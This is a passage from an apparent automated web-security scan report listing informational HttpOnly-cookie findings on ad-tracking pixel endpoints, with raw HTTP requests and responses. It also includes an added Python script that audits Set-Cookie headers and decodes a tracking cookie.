The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

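Every HttpOnly finding in this section (10.98 through 10.105) comes down to the same two questions: which attributes the Set-Cookie header lacks, and what the cookie value actually carries. The script below is an added example, not part of the XSS.CX report or of any vendor's code. It audits Set-Cookie headers copied from the responses in this section (the `sid` entry is a constructed hardened cookie added for contrast), flags the Max-Age/Expires conflict on the invitemedia `dps2b` cookie, and base64-decodes the `exchange_uid` value from the 10.98 request header to show that it is a JSON object pairing numeric keys with identifiers, which is the "review the contents of the cookie" step the finding asks for.

```python
import base64
import json
from urllib.parse import unquote

# Constructed sample: Set-Cookie headers copied from the responses in this
# report, plus one hardened cookie (the last entry, made up here) for contrast.
SAMPLE_SET_COOKIE = [
    "uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:15 GMT; Path=/",
    "i=02dd71c0-6aac-4019-82e3-049e51d96c25; expires=Wed, 08-May-2013 14:00:09 GMT; path=/; domain=.openx.net",
    "dps2b=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; Max-Age=14400",
    "29047542=_4dc7f368,4264037248,743832^884214^81^0,0_; domain=advertising.com; path=/click",
    "sid=3f9c1e; Path=/; Secure; HttpOnly",  # constructed hardened cookie, not from the report
]

# The exchange_uid value from the request in 10.98 (copied from the report);
# decoding it is the "review the contents of the cookie" step the finding asks for.
EXCHANGE_UID = ("eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0Ny"
                "ZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19")


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, attrs).

    attrs maps lower-cased attribute names to their value, or True for
    bare flags such as Secure and HttpOnly.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, has_value, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_value else True
    return name.strip(), value, attrs


def audit_set_cookie(header):
    """Return (cookie name, list of issues) for one Set-Cookie header.

    An empty issue list means the cookie carries both HttpOnly and Secure,
    is a session cookie and is not shared across subdomains.
    """
    name, _, attrs = parse_set_cookie(header)
    issues = []
    if "httponly" not in attrs:
        issues.append("missing HttpOnly")          # readable via document.cookie
    if "secure" not in attrs:
        issues.append("missing Secure")            # also sent over plain HTTP
    max_age = str(attrs.get("max-age", ""))
    if max_age.isdigit() and "expires" in attrs:
        # RFC 6265 4.1.2.2: when both are present Max-Age wins, so a past
        # Expires date does not clear the cookie (see dps2b above).
        issues.append("Max-Age=%s takes precedence over Expires" % max_age)
    elif "max-age" in attrs or "expires" in attrs:
        issues.append("persistent")                # survives the browser session
    if "domain" in attrs:
        issues.append("Domain=%s (sent to all subdomains)" % attrs["domain"])
    return name, issues


def audit_all(headers):
    """Map cookie name -> issues for a list of Set-Cookie headers."""
    return dict(audit_set_cookie(h) for h in headers)


def decode_cookie_value(value):
    """Best-effort decoding of an opaque cookie value.

    Returns ("json", obj) if the value is base64-encoded JSON, ("text", s)
    if it was only URL-encoded, and ("opaque", value) otherwise.
    """
    text = unquote(value)
    try:
        raw = base64.b64decode(text + "=" * (-len(text) % 4), validate=True)
        return "json", json.loads(raw.decode("utf-8"))
    except ValueError:
        # binascii.Error, UnicodeDecodeError and JSONDecodeError all derive from ValueError
        pass
    if text != value:
        return "text", text
    return "opaque", value


if __name__ == "__main__":
    for name, issues in audit_all(SAMPLE_SET_COOKIE).items():
        print("%-10s %s" % (name, ", ".join(issues) or "ok"))
    print("exchange_uid ->", decode_cookie_value(EXCHANGE_UID))
```

Run as a script it prints one line per cookie. On these tracking pixels the missing HttpOnly flag matters little by itself, since none of the values is a session token (the finding's own caveat says as much); the Domain attribute and the one- to two-year expiries are what make the same identifier reusable across sites, which is why the audit reports them alongside the missing flags.
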
Request

GET /data_sync?partner_id=64 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; 
segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJ7H7+DGglUCAcAECUP/o="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:00:14 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 13:59:54 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304949614+ \"5\": 1304340362+ \"4\": 1304340367}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:14 GMT; Path=/
Content-Length: 508
Set-Cookie: dps2b=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; Max-Age=14400

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://r.nexac.com/e/getdata.xgi?dt=fi&fn=adrider&pkey=tubw72p3ncbzv&repequal=-&reppipe=%26code%3D","javascript"
...[SNIP]...

10.99. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1302356071;fpan=1;fpa=P0-1958234894-1304949604185;ns=1;url=http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel;ref=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304949604184;tzo=300;a=p-25CIknq_eSg16;labels=MediaServices HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EPgAJe8kjVmM-5GL0ZmY8frRi58oyBABvAEB2gaB9ACa0aOZWBDxiz0cxeKLPR1KLMUgsqNMEf4RDCAMHxCCAg0g4gCdE7tgqRksdDECEYILsywS0zgSggMC4ZShzCW1OfFABNIA6JIA4QC-ILZLEIJIstOUo4sj

Response

HTTP/1.1 302 Found
Connection: close
Location: http://segment-pixel.invitemedia.com/pixel?pixelID=50185&partnerID=134&clientID=5061&key=segment&pb=0
Set-Cookie: d=EPUAJe8kjVmM-5GL0ZmY8frRi58oyBABvQEB2gaB9ACa0aOZWBDxiz0cxeKLPR1KLMUgsqNMEf4RDCAMHxCCAg0g4gCdE7tgqRksdDECEYILsywS0zgSggMC4ZShzCW1OfFABNIA6JIAww0b4gtksQgkiy05SjiyMA; expires=Sun, 07-Aug-2011 14:00:05 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 09 May 2011 14:00:05 GMT
Server: QS


10.100. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4212&nid=1185&put=2931142961646634775&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1185=2931142961646634775; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=154dab7990adc1d6f3372c12^8^1304807875^2915161843; csi2=3204821.js^1^1304807875^1304807875; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1; 
rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C; put_1986=2724386019227846218; cd=false

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1; expires=Wed, 08-Jun-2011 14:00:12 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C519%2C3%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C; expires=Wed, 08-Jun-2011 14:00:12 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=2931142961646634775; expires=Fri, 08-Jul-2011 14:00:12 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.101. http://r.openx.net/set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=2931142961646634775 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; s=ff27bad6-6196-4fc3-ac7a-4d20dad87fe5; p=1304949602

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:09 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; expires=Wed, 08-May-2013 14:00:09 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.102. http://r.turn.com/r/bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=18&uid=CAESEA4m3NbIVFSubIriNyJB6xg&cver=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwS
KXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; 
pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_V